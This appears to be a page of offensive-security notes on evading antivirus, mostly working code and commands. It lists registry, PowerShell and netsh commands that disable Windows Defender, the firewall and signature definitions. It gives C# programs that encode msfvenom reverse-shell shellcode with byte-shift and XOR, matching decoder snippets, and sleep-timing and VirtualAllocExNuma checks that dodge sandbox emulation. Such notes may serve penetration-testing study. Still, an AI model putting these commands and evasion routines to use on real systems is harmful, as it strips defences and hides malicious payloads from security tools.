Evasions

rmb to use x64 shellcodes and build with x64

Disable AV (admin)

May need GUI (RDP 3389) with admin access to turn off other AV (e.g. AVG)

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose

netsh Advfirewall set allprofiles state off

cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

We may add a new user for easier system access.

Shellcode Encryption

Encryptor

helper.exe

using System;
using System.Text;

namespace Helper
{
    internal class Program
    {
        static void Main(string[] args)
        {
            byte[] buf = new byte[5] {
                0xfc,0x48,0x83,0xe4,0xf0};

            byte[] encoded = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
            }

            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach (byte b in encoded)
            {
                hex.AppendFormat("0x{0:x2}, ", b);
            }

            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}

alt

using System;
using System.Text;

namespace xorer
{
    public class Program
    {
        public static void Main(string[] args)
        {
            //msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f csharp
            byte[] buf = new byte[324] {0xfc,0xe8,0x82,0x00,0x00,0x00,
            0x6f,0x6a,0x00,0x53,0xff,0xd5};

            int key = 169;

            // Encode the payload with XOR 
            byte[] encoded = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)((uint)buf[i] ^ key);
            }

            StringBuilder hex;

            if (args.Length > 0)
            {
                switch (args[0])
                {
                    case "-VBA":
                        // Printout VBA payload
                        uint counter = 0;

                        hex = new StringBuilder(encoded.Length * 2);
                        foreach (byte b in encoded)
                        {
                            hex.AppendFormat("{0:D}, ", b);
                            counter++;
                            if (counter % 50 == 0)
                            {
                                hex.AppendFormat("_{0}", Environment.NewLine);
                            }
                        }
                        Console.WriteLine($"XORed VBA payload (key: {key}):");
                        Console.WriteLine(hex.ToString());
                        break;
                    default:
                        Console.WriteLine("Accepted arguments: -VBA to print VBA payload instead of C#");
                        break;
                }
            }
            else
            {
                // Printout C# payload
                hex = new StringBuilder(encoded.Length * 2);
                int totalCount = encoded.Length;
                for (int count = 0; count < totalCount; count++)
                {
                    byte b = encoded[count];

                    if ((count + 1) == totalCount) // Dont append comma for last item
                    {
                        hex.AppendFormat("0x{0:x2}", b);
                    }
                    else
                    {
                        hex.AppendFormat("0x{0:x2}, ", b);
                    }

                    if ((count + 1) % 15 == 0)
                    {
                        hex.Append("\n");
                    }
                }

                Console.WriteLine($"XORed C# payload (key: {key}):");
                Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};");
            }

            // Decode the XOR payload
            /*
            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)((uint)buf[i] ^ {key}); // replace {key} with key value
            }
            */

            // VBA
            /*
            For i = 0 To UBound(buf)
                buf(i) = buf(i) XOR {key} // replace {key} with key value
            Next i
             */
        }
    }
}

Decryptor

insert in shellcode

for(int i = 0; i < buf.Length; i++)
{
    buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
}

Bypass heuristics scan

Sleep

insert before shellcode runs

[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
        
static void Main(string[] args)
{
    DateTime t1 = DateTime.Now;
    Sleep(2000);
    double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
    if(t2 < 1.5)
    {
        return;
    }

Non-emulated APIs

insert before shellcode runs

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, 
    uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
    
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();    

IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if(mem == null)
{
    return;
}

PreviousHTML Smuggling: Auto Download NextC# Process Injection

Last updated 1 year ago